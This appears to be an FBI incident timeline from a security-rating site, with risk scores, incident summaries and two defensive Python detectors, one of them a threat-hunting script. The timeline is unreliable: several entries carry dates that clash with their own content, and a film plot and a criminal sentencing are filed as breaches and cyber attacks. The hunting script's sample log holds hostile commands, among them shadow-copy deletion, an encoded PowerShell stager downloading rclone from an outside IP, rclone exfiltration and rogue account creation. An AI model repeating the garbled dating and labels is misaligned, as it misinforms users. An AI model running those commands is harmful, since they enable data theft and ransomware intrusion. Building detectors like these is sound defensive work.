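def detect_push_bombing(events, window=timedelta(minutes=5), min_pushes=5):
    """Push bombing is a burst of MFA prompts to one user; an 'approved'
    inside the burst means the user gave in and the resulting session
    should be treated as hostile. Returns {user: {"pushes": n, "approved": bool}}."""
    by_user = defaultdict(list)
    for e in events:
        if e["event"] == "mfa_push":
            by_user[e["user"]].append(e)
    hits = {}
    for user, evs in by_user.items():
        for s, t in _windows(evs, window):
            burst = evs[s:t + 1]
            if len(burst) >= min_pushes:
                prev = hits.get(user, {"pushes": 0, "approved": False})
                hits[user] = {
                    "pushes": max(prev["pushes"], len(burst)),
                    "approved": prev["approved"] or any(b["result"] == "approved" for b in burst),
                }
    return hits

if __name__ == "__main__":
    for src, n in detect_password_spray(EVENTS).items():
        print(f"password spray from {src}: {n} distinct accounts")
    for user, info in detect_push_bombing(EVENTS).items():
        print(f"push bombing against {user}: {info['pushes']} prompts, approved={info['approved']}")
```

Both detectors key on the shape of the activity rather than on volume alone: a single source touching many accounts, or many prompts to one account, within a short window. An approved push inside a bombing burst is the case to page on, since at that point the attacker holds a valid session and a password reset alone does not end it.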
DECEMBER 2025
Score before incident: 307
NOVEMBER 2025
Score before incident: 299
OCTOBER 2025
Score before incident: 288
SEPTEMBER 2025
Score before incident: 276
AUGUST 2025
Score before incident: 315
Breach, 15 Aug 2025, FBI
FBI (Federal Bureau of Investigation)
Compromised FBI.gov and Other Government Email Accounts Sold on Dark Web for Fraudulent Use
Score after incident: 259 (Critical, change -56)
Incident ID: FBI833081625
Compromised FBI.gov email accounts are being sold on dark web channels (e.g., Telegram, Signal) for as little as $40, granting buyers full SMTP/POP3/IMAP access. These credentials let attackers impersonate law enforcement, submit fraudulent emergency data requests (EDRs) to tech companies (bypassing legal processes such as subpoenas), and extract sensitive user data such as IP addresses, email addresses, and phone numbers. Criminals also use the accounts to distribute malware, obtain access to government-restricted intelligence tools (e.g., Shodan, Intelligence X), and log in to law enforcement portals.

The compromise stems from credential stuffing, infostealer malware, and targeted phishing, exploiting human and configuration weaknesses rather than a direct intrusion into FBI systems. Commoditizing institutional trust in this way amplifies the risk of large-scale fraud, unauthorized data disclosure, and erosion of public confidence in government communications. Mail from genuine .gov accounts passes security filters that would catch a look-alike domain, increasing phishing success rates and the potential for supply-chain attacks on private-sector entities that rely on government verification.
INCIDENT DETAILS
Type: Account compromise, credential theft, dark web marketplace activity, phishing/social engineering, infostealer malware, fraud (forged emergency data requests)
Motivation: Financial gain (selling access from $40 per account); fraud (impersonation, forged EDRs, malware distribution); exploitation of institutional trust; access to premium OSINT tools; data theft (IP addresses, emails, phone numbers)
Impact: Data compromised: email account credentials (SMTP/POP3/IMAP); potential disclosure of sensitive data via forged EDRs (e.g., IP addresses, phone numbers, emails); access to law enforcement portals and OSINT tools. Systems affected: FBI.gov email accounts; other U.S. government email accounts (.gov, .police domains); tech company and telecom provider systems (via forged EDRs); OSINT platforms (Shodan, Intelligence X). Operational impact: risk of large-scale malware campaigns; erosion of trust in government communications. Legal liabilities: potential liability for tech companies complying with forged EDRs; potential violations of data protection laws if sensitive data is disclosed via forged EDRs. Brand reputation impact: FBI/government agencies (loss of credibility); tech companies (if tricked by forged EDRs). Identity theft risk: high (impersonation of law enforcement).
Data breach: email credentials (SMTP/POP3/IMAP); potentially sensitive data via forged EDRs (e.g., subscriber information). Sensitivity of data: high (government email access, potential PII via EDRs). Data exfiltration: likely (credentials sold; data accessed via forged EDRs). Personally identifiable information: potential (if disclosed via forged EDRs).
JULY 2025
Score before incident: 310
MAY 2025
Score before incident: 329
Cyber Attack, 01 May 2025, FBI
FBI: Cyber-crime increasingly coming with threats of physical violence
Cybercriminals Escalate Threats with Physical Violence in Extortion Schemes
Score after incident: 277 (Critical, change -52)
Incident ID: FBI1778466322
Cyberattacks are increasingly accompanied by threats of physical harm, marking a dangerous evolution in ransomware and extortion tactics. According to FBI data, incidents involving physical threats in the U.S. more than doubled last year, with similar trends reported in Europe, where over 18 cases were documented. Attackers leverage stolen personal data such as home addresses, social security numbers, and workplace details to intimidate victims. In one instance, hospital staff received harassing calls from hackers who named nurses individually and disclosed their private information, creating a climate of fear. Some criminals go further, hiring third parties to carry out threats or even commit violence, a tactic known as "violence-as-a-service."

The cryptocurrency sector has become a hotspot for such attacks, with hackers targeting high-profile investors who flaunt their wealth online. Last year, French police rescued the father of a cryptocurrency millionaire who had been kidnapped, and another victim reportedly had a finger severed as part of an extortion attempt. Many perpetrators are young; FBI profiles put their ages between 17 and 25.

Ransomware gangs, some sponsored by states such as Russia, China, Iran, and North Korea, are driving this shift. A Semperis report found that in 40% of global ransomware attacks in 2025, criminals resorted to physical threats. The financial toll is staggering: U.S. organizations lost $20.8 billion to cybercrime last year, up from $16.6 billion in 2024. Experts warn the trend will persist as long as victims continue to pay ransoms. In one case, a cybersecurity negotiator received a threatening package at his home, underscoring the personal risks faced by those involved in ransom negotiations. The rise of "In Real Life Com," a network of online-linked criminals, has further normalized real-world violence in cyber extortion schemes.
INCIDENT DETAILS -
TYPE
Ransomware, extortion, physical threats
MOTIVATION
Financial gain, intimidation, data extortion
IMPACT
Financial Loss: $20.8 billion (U.S. organizations in 2025). Data exposed: home addresses, Social Security numbers, workplace details, other personally identifiable information. Other effects: climate of fear in hospitals; disruption of cryptocurrency operations. Identity Theft Risk: high
DATA BREACH
Data types: personally identifiable information, workplace details, home addresses. Sensitivity Of Data: high. Data Exfiltration: yes. Personally Identifiable Information: yes
JANUARY 2025
Score before incident: 390
Cyber Attack | 01 Jan 2025 | FBI
FBI: Seniors Targeted—FBI Issues Cyber Attack Advice For The Over 60s
FBI Warns Seniors as Cyber Scams Surge, Losses Hit $7.7 Billion in 2025
Score after incident: 288 (HIGH, impact -102). Record ID: FBI1778948621
In observance of National Senior Fraud Awareness Day on May 15, the FBI issued a stark warning about the escalating threat of cyber scams targeting Americans over 60. According to the FBI’s Internet Crime Complaint Center (IC3), seniors filed over 200,000 fraud complaints in 2025, a 37% increase from the previous year, with financial losses soaring to $7.7 billion, up 59% from 2024. FBI Special Agent Rebecca Keithley attributed the targeting of older adults to several factors: accumulated savings, greater trust in unsolicited communications, and vulnerability to loneliness, which scammers exploit to establish fraudulent relationships. Common schemes include impersonation of relatives in financial distress, fake tech support offers, romance scams, and fraudulent charity solicitations. The FBI highlighted key red flags: demands for secrecy, urgency, and requests for wire transfers or payment via gift cards. Special Agent Ron Miller emphasized that ignoring unsolicited calls and messages is the most effective defense, as prolonged engagement increases the likelihood of falling victim. The warning underscores the growing sophistication and financial impact of scams that disproportionately affect older populations.
INCIDENT DETAILS -
TYPE
Scam
MOTIVATION
Financial gain
IMPACT
Financial Loss: $7.7 billion. Customer Complaints: 200,000 fraud complaints. Identity Theft Risk: High
Cyber Attack | 01 Jan 2025 | FBI
FBI Internet Crime Complaint Center: FBI Flags Cybercrime Losses Hit $20.87 Billion As AI Fuels Online Fraud
AI-Driven Cybercrime Losses Hit Record $20.87 Billion in 2025, FBI Reports
Score after incident: 288 (CRITICAL, impact -102). Record ID: FBI1775659096
Cybercrime losses surged to an unprecedented $20.87 billion in 2025, with artificial intelligence playing an increasingly central role in fraud schemes, according to the FBI’s Internet Crime Complaint Center (IC3) report. For the first time, the report included a dedicated section on AI, underscoring its growing use by criminal networks to increase the scale and sophistication of attacks. AI-powered fraud accounted for 22,364 complaints and $893 million in reported losses, though authorities believe the true figure is higher because of underreporting and victims’ unawareness of AI involvement.

Cyber-enabled fraud (traditional scams executed with the help of technology) dominated the landscape, representing 45% of complaints but 85% of total financial losses. The total number of cybercrime complaints exceeded one million in 2025, a 17% increase from the previous year. Phishing remained the most reported offense, followed by extortion and investment scams. Investment fraud, however, caused the greatest financial damage, totaling $8.6 billion, while business email compromise (BEC) and tech support scams also contributed heavily to losses. While ransomware and data breaches accounted for 75% of reported technical attacks, the majority of cybercrime activity centered on digitally enabled fraud rather than purely technical exploits.

AI-driven tactics included deepfake voices, cloned identities, and fabricated video content, used in BEC, romance scams, employment fraud, and investment schemes. A particularly alarming trend was the 128% surge in government impersonation scams, rising from 14,190 reports in 2023 to 32,424 in 2025. The FBI warned that AI-generated messages impersonating officials, including voice and text communications, have been used to deceive victims into compromising personal accounts. Despite their rapid growth, these scams received limited attention in AI-specific reporting. The report highlighted the evolving nature of cyber threats, driven by the broader adoption of emerging technologies and signaling a shift toward more adaptive and deceptive criminal tactics.
INCIDENT DETAILS -
TYPE
Fraud, phishing, extortion, investment scams, ransomware, data breaches, business email compromise (BEC), tech support scams, government impersonation scams
MOTIVATION
Financial gain
IMPACT
Financial Loss: $20.87 billion. Customer Complaints: 1,000,000+ complaints
DECEMBER 2024
Score before incident: 447
Cyber Attack | 05 Dec 2024 | FBI
Stryker and Federal Bureau of Investigation: Pro-Iranian group claims credit for hacking into FBI Director Patel's personal account
Pro-Iranian Hackers Claim Breach of FBI Director’s Personal Account
Score after incident: 429 (CRITICAL, impact -18). Record ID: STRFBI1774644063
A pro-Iranian hacking group, Handala, announced on Friday that it had compromised an account belonging to FBI Director Kash Patel, releasing decades-old personal photographs, a resume, and other documents online. The group, which has ties to Iran and Palestine, posted a statement alongside the materials, taunting Patel and declaring him among their "successfully hacked victims." The leaked files, including images of Patel with a vintage sports car and a cigar, appear to date back over a decade and consist primarily of personal travel and business records. The FBI confirmed awareness of the incident, stating that the exposed data was historical and contained no classified or government information, and added that it had taken steps to mitigate risks from the breach. The timing of the hack remains unclear, though reports from December 2024 indicated Patel had previously been warned by the FBI about Iranian targeting efforts.

Handala, which has escalated its cyber operations in recent months, recently claimed responsibility for disrupting systems at Stryker, a Michigan-based medical technology firm, in retaliation for alleged U.S. airstrikes linked to Iranian civilian casualties. The group has been a persistent threat: the U.S. Justice Department seized four web domains tied to its operations last week as part of efforts to counter Iranian cyber campaigns, and the Trump administration has offered a $10 million reward for information leading to the identification of Handala members. The incident underscores the growing role of proxy hacking groups in Iran’s broader cyber conflict with Western targets.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Retaliation for alleged U.S. airstrikes linked to Iranian civilian casualties; cyber conflict with Western targets
IMPACT
Data Compromised: personal photographs, resume, and other personal documents. Brand Reputation Impact: potential reputational harm to the FBI Director. Identity Theft Risk: possible, due to exposure of personal documents
DATA BREACH
Type Of Data Compromised: personal photographs, resume, personal documents (images, documents). Sensitivity Of Data: Low (historical, no classified or government information). Data Exfiltration: Yes. Personally Identifiable Information: Yes
DECEMBER 2024
Score before incident: 502
Breach | 01 Dec 2024 | FBI
Investigation of Radical Ideology Inspired by 'The Turner Diaries'
Score after incident: 446 (CRITICAL, impact -56). Record ID: FBI001121924
In the film 'The Order,' the FBI investigates the proliferation of a radical ideology that leads to significant acts of domestic terrorism, including armed revolt and assassination. Based on historical events, the narrative identifies the influence of 'The Turner Diaries' in inspiring Timothy McVeigh's Oklahoma City bombing. Given the profound effect on national security and the potential for sparking wide-ranging violence, the involvement of law enforcement to thwart such threats is imperative.
INCIDENT DETAILS -
TYPE
Domestic Terrorism, Armed Revolt, Assassination
MOTIVATION
Radical Ideology, Political Motives
AUGUST 2024
Score before incident: 535
Breach | 01 Aug 2024 | FBI
Dissemination of Propaganda and Child Abuse Material by FBI Informant
Score after incident: 479 (CRITICAL, impact -56). Record ID: FBI001080624
An FBI informant, Joshua Caleb Sutter, linked to extreme right-wing and neo-Nazi movements disseminated propaganda contributing to the rise of violent groups and networks engaged in child abuse. His actions, along with other radical elements, have led to the proliferation of child sexual abuse material (CSAM) and potentially influenced ultraviolent terrorist acts. Despite Sutter's past as an informant and implication in serious crimes, the FBI's stance and handling of his case remain unclear, raising concerns over informant accountability and the extent of malfeasance overlooked in intelligence operations.
INCIDENT DETAILS -
TYPE
Dissemination of Propaganda and Child Abuse Material
MOTIVATION
Right-wing Extremism, Neo-Nazism
IMPACT
Brand Reputation Impact: Concerns over FBI's handling of informants
JANUARY 2024
Score before incident: 600
Breach | 01 Jan 2024 | FBI
FBI Dallas and Texas Attorney General: Texas Cyber Crooks Siphon Off $70.4 Million In Data Breach Hits
Texas Personal Data Breach Losses in 2024
Score after incident: 498 (CRITICAL, impact -102). Record ID: TEXFBI1773153659
Texas residents lost over $70.4 million in 2024 to account takeovers and identity fraud, a sharp increase driven by criminals exploiting stolen personal data. According to an FBI Dallas Facebook post on March 9, the losses stem from breaches of bank accounts, investment portfolios, email systems, devices, and cryptocurrency wallets. The figure reflects a growing trend of fraudsters bypassing traditional identity theft to drain financial assets directly. The $70.4 million total marks a significant rise from previous years: Texas reported $37 million in 2020, $42 million in 2021, $46 million in 2022, and $31 million in 2023. These losses contribute to the FBI’s Internet Crime Complaint Center (IC3) national tally, which recorded over $16 billion in U.S. cybercrime losses in 2024. Texas ranks among the states with the highest financial impacts, with extortion, personal data breaches, and phishing as the most common complaint types.

Criminals leverage stolen data such as Social Security numbers, birthdates, and account credentials to reset passwords, bypass security measures, and siphon funds across linked accounts. A single breach can trigger cascading theft, amplifying financial damage. The IC3’s 2024 Internet Crime Report highlights the scale of these attacks, with personal data breaches generating some of the largest losses nationwide.

In response, law enforcement is pushing for faster victim reporting and stronger account protections to disrupt fraudulent transactions before funds are irretrievable. Texas businesses facing breaches must comply with state reporting laws, notifying affected individuals and regulators under guidelines set by the Texas Attorney General. Early reporting aids recovery efforts and helps authorities track emerging fraud patterns. The FBI continues to urge victims to alert financial institutions, file complaints via IC3, and contact local law enforcement, emphasizing that timely reporting strengthens investigations and supports broader enforcement actions.
INCIDENT DETAILS -
TYPE
Data Breach, Identity Fraud, Account Takeover
MOTIVATION
Financial gain
IMPACT
Financial Loss: $70.4 million. Data Compromised: personal data (Social Security numbers, birthdates, account credentials), financial account details, cryptocurrency wallets. Systems Affected: bank accounts, investment portfolios, email systems, devices, cryptocurrency wallets. Identity Theft Risk: High. Payment Information Risk: High
DATA BREACH
Type Of Data Compromised: personal data, financial account details, cryptocurrency wallet information. Sensitivity Of Data: High (PII, financial data). Data Exfiltration: Yes. Personally Identifiable Information: Social Security numbers, birthdates, account credentials
FEBRUARY 2023
Score before incident: 611
Breach | 12 Feb 2023 | FBI
Federal Bureau of Investigation: Foreign hacker reportedly breached FBI servers holding Epstein files in 2023
FBI’s Epstein Investigation Files Compromised in 2023 Cyber Breach by Foreign Hacker
Score after incident: 555 (CRITICAL, impact -56). Record ID: FBI1773239371
In February 2023, a foreign hacker infiltrated a server at the FBI’s New York field office, accessing files related to the bureau’s investigation of the late sex offender Jeffrey Epstein. The breach, first reported by Reuters and CNN on February 17, 2024, occurred when a server in the FBI’s child exploitation forensic lab was left vulnerable because of procedural errors by Special Agent Aaron Spivack, according to internal documents. The intrusion was discovered on February 13, 2023, after Spivack found a text file warning of the compromise. Internal documents revealed the hacker had searched through Epstein-related files, though it remains unclear whether data was exfiltrated or which specific records were accessed. The FBI described the incident as an “isolated” cyber incident, stating it had restricted access and remediated the network, though its investigation is ongoing.

A source familiar with the breach indicated the hacker was likely a cybercriminal rather than a state actor, though the incident highlights the intelligence value of Epstein’s files. The release of U.S. Justice Department documents in recent years has exposed Epstein’s ties to high-profile figures, sparking global investigations. Security experts, including Georgia Tech’s Jon Lindsay, have noted the potential for foreign intelligence services to exploit such material as kompromat (compromising information). The hacker reportedly expressed shock upon encountering child abuse imagery on the server and threatened to report the owner to law enforcement. FBI officials defused the situation by convincing the hacker of their identity via a video call, during which they displayed law enforcement credentials. The hacker’s identity, origin, and motives remain unknown, as does whether any data was retained or disseminated.

The breach stemmed from Spivack’s attempt to navigate the FBI’s complex digital evidence protocols, according to internal documents. Spivack, who has been involved in the Epstein investigation, denied responsibility, citing conflicting bureau policies and inadequate IT guidance. The outcome of the FBI’s internal review is unclear. Many of the Justice Department’s Epstein-related documents remain heavily redacted or withheld, with the Trump administration citing protections for victims and ongoing investigations. The incident underscores the persistent risks of cyber intrusions targeting sensitive law enforcement data.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Potential intelligence value (kompromat), financial gain, or opportunistic access
IMPACT
Data Compromised: files related to the Jeffrey Epstein investigation, possibly including child abuse imagery. Systems Affected: FBI New York field office server (child exploitation forensic lab). Operational Impact: restricted access to the affected server; ongoing investigation. Brand Reputation Impact: potential reputational damage to the FBI from sensitive data exposure
DATA BREACH
Type Of Data Compromised: investigative files, child abuse imagery, personally identifiable information (PII) of victims and persons of interest. Sensitivity Of Data: High (involves child exploitation, high-profile individuals, and national security implications). Data Exfiltration: Unclear. Personally Identifiable Information: Likely (victims, witnesses, and persons of interest in the Epstein investigation)
JANUARY 2022
Score before incident: 721
Ransomware | 01 Jan 2022 | FBI
FBI: Ransomware hit critical infrastructure hard in 2022, FBI says
FBI Reports Ransomware Surge in Critical Infrastructure
Score after incident: 554 (CRITICAL, impact -167). Record ID: FBI1774268926
In 2022, ransomware attacks continued to plague organizations, with phishing, remote desktop protocol (RDP) exploitation, and software vulnerabilities remaining the primary initial infection vectors, according to the FBI. Threat actors increasingly relied on extortion tactics, threatening to leak stolen data to pressure victims into paying ransoms. Of the 2,385 ransomware incidents reported to the FBI last year, 870 targeted critical infrastructure sectors, with the healthcare and public health sector bearing the brunt of attacks. Collectively, these infections resulted in adjusted losses exceeding $34 million. However, the FBI acknowledged that the true scale of ransomware activity remains underreported, as many incidents are never reported to law enforcement. Extortion, both ransomware-related and other forms, ranked as the fourth-highest cybercrime type reported to the FBI in 2022, though overall extortion complaints remained flat compared to 2021 and down nearly 50% from a 2020 peak.

Security leaders and government officials emphasized the need for bipartisan cooperation on cyber resilience, stressing that national security priorities should transcend partisan divides, particularly as the U.S. approaches the presidential election. Experts also warned that third-party vendors must prioritize secure development practices over speed to market to mitigate supply chain risks. The report underscores the ongoing threat ransomware poses to critical infrastructure, with healthcare, public health, and other essential services facing disproportionate targeting.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Extortion, Financial Gain
IMPACT
Financial Loss: $34 million (adjusted losses)
DATA BREACH
Data Exfiltration: Threatened (extortion tactic)
JULY 2021
Score before incident: 710
Ransomware | 15 Jul 2021 | FBI
FBI, Multi-State Information Sharing and Analysis Center and Cybersecurity and Infrastructure Security Agency: I've Been Hit By Ransomware!
#StopRansomware Guide Update for Incident Response
Score after incident: 610 (CRITICAL, impact -100). Record ID: CISTHEFBI1774844752
In May 2023, the Cybersecurity and Infrastructure Security Agency (CISA), alongside the FBI, NSA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC), released an updated #StopRansomware Guide to standardize ransomware response protocols. The guide outlines a structured approach for organizations to detect, contain, eradicate, and recover from ransomware attacks, emphasizing coordinated action to minimize damage.

The response process begins with detection and analysis. Impacted systems must be isolated immediately, either by disconnecting networks at the switch level or by physically unplugging devices; for cloud environments, snapshots of affected volumes should be taken for forensic review. Organizations are advised to use out-of-band communication (e.g., phone calls) to avoid tipping off attackers, who may monitor internal activity to escalate attacks. If isolation is not feasible, powering down devices is recommended, though this risks losing volatile memory evidence. Critical systems, such as those tied to health, safety, or revenue, should be prioritized for restoration, while unaffected systems are deprioritized to streamline recovery. Security teams are urged to examine logs for precursor malware (e.g., Bumblebee, QakBot, or Cobalt Strike) and signs of data exfiltration, as ransomware often follows earlier compromises. Threat hunting should focus on anomalous activity, including unauthorized Active Directory accounts, suspicious VPN logins, and misuse of built-in Windows tools such as vssadmin.exe and of administrative utilities such as PsExec to inhibit recovery. Reporting and notification are critical, with organizations directed to engage internal stakeholders (IT, leadership, cyber insurers) and external agencies such as CISA, the FBI, or the U.S. Secret Service. If a data breach occurs, legal and communications teams must follow incident response plans to manage disclosures.

Containment and eradication involve capturing system images, memory dumps, and malware samples for analysis. Trusted guidance (e.g., from CISA or security vendors) should be followed to disable ransomware binaries and remove associated registry entries. Breaches often involve credential theft, requiring measures like disabling remote access and resetting passwords. Forensic analysis should identify persistence mechanisms, such as rogue accounts or backdoors, before systems are rebuilt using clean images or infrastructure-as-code templates. Recovery prioritizes reconnecting systems from offline backups while preventing reinfection. Post-incident, organizations are encouraged to document lessons learned and share indicators of compromise with CISA or sector-specific ISACs to bolster collective defense. The guide underscores that ransomware incidents may signal deeper compromises, necessitating thorough investigation to prevent recurrence.
INCIDENT DETAILS -
TYPE
Ransomware
DATA BREACH
Data Exfiltration: Possible (threat hunting for signs of data exfiltration). Data Encryption: Possible (ransomware data encryption)
JUNE 2021
Score before incident: 749
Cyber Attack | 16 Jun 2021 | FBI
Man pardoned for Jan. 6 gets life in prison for plotting to incite 'civil war,' attack FBI agents
Score after incident: 732 (CRITICAL, impact -17). Record ID: FBI501070425
Edward Kelley, a Tennessee man pardoned for his role in the Jan. 6, 2021, U.S. Capitol assault, was sentenced to life in prison for plotting to attack FBI agents and seeking to incite a 'civil war.' Kelley created a 'kill list' of FBI agents and distributed it to a co-conspirator. He was convicted of conspiracy charges and viewed the FBI as the enemy, targeting them for assassination. The Justice Department stated that Kelley identified 36 law enforcement personnel to target, including names, titles, and cell phone numbers.
INCIDENT DETAILS -
TYPE
Conspiracy to incite civil war and attack FBI agents
MOTIVATION
Incite civil war; target law enforcement for assassination
JUNE 2021
Score before incident: 750
Cyber Attack | 01 Jun 2021 | FBI
CISA, Symantec, FBI and Fortinet: Medusa Ransomware Hits 40+ Victims in 2025, Demands $100K–$15M Ransom
Medusa Ransomware Surges, Targeting Critical Infrastructure with Double Extortion Tactics
Score after incident: 725 (LOW, impact -25). Record ID: CISSYMFBIFOR1768715192
The Medusa ransomware operation, tracked by Symantec as Spearwing, has claimed nearly 400 victims since its emergence in January 2023, with attacks rising 42% between 2023 and 2024. In the first two months of 2025 alone, over 40 incidents have been attributed to the group, signaling an aggressive expansion amid the disruption of other major ransomware-as-a-service (RaaS) players like LockBit and BlackCat. Medusa employs double extortion, stealing sensitive data before encrypting networks to pressure victims into paying ransoms ranging from $100,000 to $15 million. Targets span the healthcare, financial services, government, education, legal, and manufacturing sectors, many within critical infrastructure. If victims refuse to pay, the group threatens to leak stolen data via its dedicated leak site.

Attack methods and tools: Medusa’s intrusion chains often begin with exploitation of known vulnerabilities in public-facing applications, particularly Microsoft Exchange Server, or with access bought from initial access brokers. Once inside, the attackers deploy remote management tools such as SimpleHelp, AnyDesk, and MeshAgent for persistence, and use the Bring Your Own Vulnerable Driver (BYOVD) technique to disable antivirus software with KillAV, a tactic previously seen in BlackCat attacks. Other tools in Medusa’s arsenal include:
- PDQ Deploy for lateral movement and payload delivery
- Navicat for database access
- RoboCopy and Rclone for data exfiltration
- Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance
- Ligolo and Cloudflared for command-and-control (C2) tunnelling and evasion
The group also relies on living-off-the-land (LotL) techniques such as Base64-encoded PowerShell commands to avoid detection, on Mimikatz for credential theft, and on legitimate remote access tools like ConnectWise and PsExec to move undetected.

Evasion and triple extortion risks: Medusa actors take steps to evade detection, including deleting PowerShell command histories and terminating endpoint detection and response (EDR) tools. In at least one case, a victim who paid the ransom was later contacted by a separate Medusa affiliate, who claimed the original negotiator had stolen the funds and demanded an additional payment, suggesting a potential triple extortion scheme.

CISA advisory and historical context: A joint advisory from CISA, the FBI, and MS-ISAC, released on March 12, 2025, revealed that Medusa had compromised over 300 critical infrastructure victims as of December 2024. The group, unrelated to MedusaLocker or the Medusa mobile malware, first appeared in June 2021 as a closed ransomware variant before shifting to an affiliate-based model. While affiliates execute attacks, core developers retain control over ransom negotiations. Recent campaigns have exploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Despite the volatility of the RaaS landscape, with new groups like Anubis, LCRYX, and Xelera emerging, Medusa has established itself as a persistent threat, ranking among the top ransomware actors in late 2024.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain, Data extortion
IMPACT
Financial Loss: ransoms ranging from $100,000 to $15 million. Data Compromised: sensitive data stolen before encryption. Identity Theft Risk: High (due to data exfiltration)
DATA BREACH
Type Of Data Compromised: sensitive data (including personally identifiable information). Sensitivity Of Data: High
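The hunting steps in the #StopRansomware entry above (vssadmin.exe and PsExec misuse, unauthorized accounts) and the Medusa tradecraft in this entry (Base64-encoded PowerShell, Rclone exfiltration, deletion of PowerShell history) reduce to pattern matching over process-creation telemetry plus decoding of the PowerShell payload, so one script serves both passages. The script below is an added example written for this page, not code from CISA, the FBI, Symantec or the Medusa advisory. The key=value log format, the host and user names, and the encoded payload are all constructed; the rule set is deliberately narrow and would need the precursor-malware and VPN-login hunts the guide also calls for.

```python
"""Threat hunt over endpoint process-creation logs for the activity this page
names: vssadmin/PsExec misuse and rogue accounts (the #StopRansomware guide's
threat-hunting step) and Base64-encoded PowerShell, Rclone exfiltration and
PowerShell history wiping (the Medusa write-up).

Added example, not code from CISA, the FBI, Symantec or any vendor. The
key=value log format and all sample events are constructed; map the field
names (host, user, cmd) to your EDR or Sysmon Event ID 1 schema before use."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str


# (rule name, regex over the process command line)
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"
                r"|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|bcdedit(\.exe)?\b.*recoveryenabled\s+no", re.I)),
    ("psexec_remote_exec", re.compile(r"\bpsexe(c|svc)(\.exe)?\b", re.I)),
    ("rclone_exfil", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("new_local_account", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("powershell_history_wipe", re.compile(r"ConsoleHost_history\.txt", re.I)),
]
# powershell ... -e / -ec / -enc / -EncodedCommand <base64>
ENCODED_PS = re.compile(
    r"powershell(\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download/execute primitives that turn "encoded PowerShell" into "stager".
DOWNLOAD_MARKERS = re.compile(
    r"Invoke-WebRequest|Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|rclone", re.I)
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one 'key=value key="quoted value"' event line into a dict."""
    return {k: quoted or bare for k, quoted, bare in KV.findall(line)}


def decode_encoded_powershell(cmd: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell expects the Base64 to wrap UTF-16LE text; a payload that does not
    decode cleanly is still reported rather than silently dropped."""
    m = ENCODED_PS.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def hunt(log_text: str) -> list:
    """Run every rule over every event; one Finding per (event, rule) hit."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        host, cmd = event.get("host", "?"), event.get("cmd", "")
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(host, name, cmd))
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            rule = ("encoded_powershell_download" if DOWNLOAD_MARKERS.search(decoded)
                    else "encoded_powershell")
            findings.append(Finding(host, rule, f"decoded: {decoded}"))
    return findings


def hosts_to_isolate(findings) -> list:
    """Hosts with at least one hit; the guide's first containment step is isolation."""
    return sorted({f.host for f in findings})


# Constructed sample events. The encoded payload is built here so the example
# runs offline; it is exactly what PowerShell's -EncodedCommand expects.
_STAGER = base64.b64encode(
    "Invoke-WebRequest http://198.51.100.7/rclone.zip -OutFile C:\\Users\\Public\\r.zip"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    r'host=WS01 user=CORP\jdoe cmd="C:\Windows\System32\svchost.exe -k netsvcs"',
    r'host=WS01 user=CORP\jdoe cmd="vssadmin delete shadows /all /quiet"',
    r'host=SRV02 user=CORP\admin cmd="psexec.exe \\WS01 -s cmd.exe"',
    'host=WS01 user=CORP\\jdoe cmd="powershell.exe -nop -w hidden -enc ' + _STAGER + '"',
    r'host=WS01 user=CORP\jdoe cmd="rclone.exe copy C:\Finance mega:dump --transfers 8"',
    r'host=DC01 user=CORP\admin cmd="net user svc_backup P@ss123 /add"',
    r'host=WS01 user=CORP\jdoe cmd="cmd.exe /c del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"',
    r'host=WS01 user=CORP\jdoe cmd="powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"',
])

if __name__ == "__main__":
    results = hunt(SAMPLE_LOG)
    for f in results:
        print(f"{f.host:6} {f.rule:28} {f.evidence[:70]}")
    print("isolate:", hosts_to_isolate(results))
```

Run it as-is to hunt the embedded sample, or pass hunt() the text of an exported process-creation log in the same layout. Two design points: encoded PowerShell is reported even when the decoded text looks harmless, because the decoded command, not the fact of encoding, is what the analyst triages; and hosts_to_isolate() exists because the guide's first containment step (disconnect at the switch or pull the cable) needs a host list rather than a hit list.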
JUNE 2017
Score before incident: 741
Breach | 16 Jun 2017 | FBI
Alleged Unauthorized Media Leak by Former FBI Director James Comey Involving Daniel Richman
Score after incident: 684 (HIGH, impact -57). Record ID: FBI3562235102125
